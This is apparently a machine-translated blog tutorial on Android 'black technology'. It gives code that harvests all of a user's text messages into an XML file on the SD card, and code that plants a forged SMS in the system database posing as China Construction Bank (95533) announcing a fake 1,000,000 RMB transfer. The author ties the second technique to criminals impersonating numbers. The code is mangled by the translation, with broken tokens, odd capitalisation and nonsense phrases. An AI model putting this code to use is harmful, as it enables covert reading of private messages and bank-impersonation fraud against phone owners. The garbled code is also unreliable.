Android black technology, reading user text messages + modifying System text message database,
Compared to the ios system, Android is the biggest drawback. As we all know, it is a system security problem. This blog shows a wave of "black technology ".
Read user text messages
Android apps can read text messages from users' mobile phones. I believe this is nothing new. For example, some apps can automatically obtain and fill in the verification code, saving us the need to manually enter the verification code. The principle is to indirectly access the SMS database of the system through the ContentProvider component of Android to obtain all the SMS content. The following is a demonstration.
The layout is simple as follows:
The Code is as follows:
Public class MainActivity extends Activity {List <Message> smsList; @ Override protected void onCreate (Bundle savedInstanceState) {super. onCreate (savedInstanceState); setContentView (R. layout. activity_main); smsList = new ArrayList <Message> ();} public void click (View v) {// access the content provider to obtain the SMS ContentResolver cr = getContentResolver (); // The Host Name of the text message content provider, Cursor cursor = cr. query (Uri. parse ("content: // sms"), new String [] {"address", "date", "body", "type"}, null ); while (cursor. moveToNext () {String address = cursor. getString (0); long date = cursor. getLong (1); String body = cursor. getString (2); String type = cursor. getString (3); Message sms = new Message (body, type, address, date); smsList. add (sms); Log. e ("TAG", sms. toString () ;}} public void click2 (View v) {XmlSerializer xs = Xml. newSerializer (); File file = new File ("sdcard/sms. xml "); FileOutputStream fos; try {fos = new FileOutputStream (file); xs. setOutput (fos, "UTF-8"); xs. startDocument ("UTF-8", true); xs. startTag (null, "message"); for (Message sms: smsList) {xs. startTag (null, "sms"); xs. startTag (null, "body"); xs. text (sms. getBody (); xs. endTag (null, "body"); xs. startTag (null, "date"); xs. text (sms. getDate () + ""); xs. endTag (null, "date"); xs. startTag (null, "type"); xs. text (sms. getType (); xs. endTag (null, "type"); xs. startTag (null, "address"); xs. text (sms. getAddress (); xs. endTag (null, "address"); xs. endTag (null, "sms");} xs. endTag (null, "message"); xs. endDocument ();} catch (Exception e) {// TODO Auto-generated catch block e. printStackTrace ();}}}
Message code:
1 package com.itheima.getsms.domain; 2 3 public class Message { 4 5 private String body; 6 private String type; 7 private String address; 8 private long date; 9 public String getBody() {10 return body;11 }12 public void setBody(String body) {13 this.body = body;14 }15 public String getType() {16 return type;17 }18 public void setType(String type) {19 this.type = type;20 }21 public String getAddress() {22 return address;23 }24 public void setAddress(String address) {25 this.address = address;26 }27 public long getDate() {28 return date;29 }30 public void setDate(long date) {31 this.date = date;32 }33 public Message(String body, String type, String address, long date) {34 super();35 this.body = body;36 this.type = type;37 this.address = address;38 this.date = date;39 }40 @Override41 public String toString() {42 return "Message [body=" + body + ", type=" + type + ", address="43 + address + ", date=" + date + "]";44 }45 46 47 }
To read and insert text messages, you must add the following permissions:
<uses-permission android:name="android.permission.READ_SMS"/> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
The code below is analyzed: the first button indirectly obtains some text message information through ContentProvider and stores it in a List array. Let's take a look at the sms table of the Android system:
There are 17 fields in total, which are obviously not all of our concerns. Here we only need the address, date, body, and type fields, which indicate the recipient's number, SMS time, and SMS content respectively, send or receive. The second button stores the text message information in a serialized XML file for ease of viewing.
Put XML:
We can see that there are a total of five text messages on the mobile phone at this time.
Modify system SMS Database
The real black technology is coming. I believe everyone knows that some criminals can impersonate various numbers to publish false information, such as 10086. The following shows how to use 95533 (China Construction Bank) to send a fool's card.
The Code is as follows:
Public class MainActivity extends Activity {@ Override protected void onCreate (Bundle savedInstanceState) {super. onCreate (savedInstanceState); setContentView (R. layout. activity_main);} public void click (View v) {Thread t = new Thread () {@ Override public void run () {ContentResolver cr = getContentResolver (); contentValues values = new ContentValues (); values. put ("address", 95533); values. put ("type", 1); values. put ("date", System. currentTimeMillis (); values. put ("body", "your credit card with the ending number 9999 received the 1,000,000 RMB transfer, please check"); cr. insert (Uri. parse ("content: // sms"), values) ;}}; t. start ();}}
The idea is similar to the previous step, but a text message is inserted here. Effect:
By default, apps outside the sms application cannot send text messages in the form of write sms, which means that the system sms database cannot be modified, however, the bug of reading user text messages has not been fixed yet. So if you don't want to be cheated, upgrade your shoes to version 5.0 or above. ^_^